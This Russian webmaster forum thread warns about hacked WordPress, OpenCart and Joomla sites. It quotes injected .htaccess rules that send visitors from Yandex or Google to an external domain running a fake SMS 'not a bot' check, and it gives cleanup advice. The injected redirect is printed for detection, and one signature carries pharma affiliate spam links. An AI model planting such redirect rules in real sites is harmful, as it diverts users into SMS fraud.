Форум Поисковые системы Яндекс

Внимание! Проверяйте метрику - Взлом сайтов

12
IO
На сайте с 30.01.2012
Offline
62
IDO
2142

При переходе с поисковых систем на некоторых сайтах возможно появление вот такого сюрприза:

Нужно якобы подтвердить с помощью мобильника, что пользователь не бот.. с вытекающими

а у себя в .htaccess Вы сможете обнаружить вот такое:

RewriteCond %{HTTP_REFERER} ^.*yandex.* [NC,OR]

RewriteCond %{HTTP_REFERER} ^.*google.* [NC]

RewriteRule ^(.*)$ http://security.dns-dns.com/?RETURN=%{HTTP_HOST}%{REQUEST_URI}&ID=36 [QSA,L]

Замечено это было на движках Wordpress.. возможно это взлом, а возможно и партнёрка :popcorn:

Возможное лечение:

- удалить эти строки (возможен другой домен) с .htaccess, обновить движки, сменить пароли и т.д.

jpg vzlom.jpg
R
На сайте с 24.01.2008
Offline
180
Алексей
#1

Проверять нужно весь сайт на наличие не только вирусов, но и шеллов, чтобы быть уверенным.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
YoKonn
На сайте с 02.05.2012
Offline
13
YoKonn
#2

На ucoz такое тоже может быть?

Покупаю uCoz сайты дорого... (в личку)
[Удален]
#3
YoKonn:
На ucoz такое тоже может быть?

Только если через какой ни будь яваскрипт встраиваемый в html код

Z
На сайте с 02.06.2012
Offline
10
Zenitchik
#4

У меня Opencart, но такая хрень тоже была.

YoKonn
На сайте с 02.05.2012
Offline
13
YoKonn
#5
uoOk:
Только если через какой ни будь яваскрипт встраиваемый в html код

А каким образом они смогут его вставить к примеру ко мне на сайт? В новости если только...или нет?

[Удален]
#6

На сайте на джумле та же фигня

dino_spomoni
На сайте с 09.06.2007
Offline
633
dino_spomoni
#7

Партнерка скорее всего.

#1 ФАРМ партнёрка, API, 80%+ АПРУВ! Мега крутой конверт, льем всю фарму! -> https://bit.ly/3EvLxX8 | Профи в фарме? Тебе в Union Pharm! -> https://u.to/aXwsIg | PharmEmpire - ТОП Конверт фарма трафика!!! -> https://clck.ru/QrgKx | Рассылки цифровых сообщений и на WhatsApp! -> https://bit.ly/3FVSDYb
IO
На сайте с 30.01.2012
Offline
62
IDO
#8

Какая же это партнерка если юзеры без понятия от куда это на их сайтах ...

[Удален]
#9

нет, это взлом, а не партнерка

GeorgeWhite
На сайте с 27.05.2008
Offline
131
GeorgeWhite
#10

Это совершенно точно не партнерка. У меня эта хрень примерно месяц назад появлялась вместе с шеллом. Ломают массово. Где-то проскакивало мнение, что, возможно, через уязвимость в php, но досконально в вопросе не разбирался.

Еще на ту же тему: /ru/forum/712763, /ru/forum/717856

Поисковые запросы в Яндекс.Вебмастере Соцсеть Google+ официально закрыта «Играем в доктора»: неправильное
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий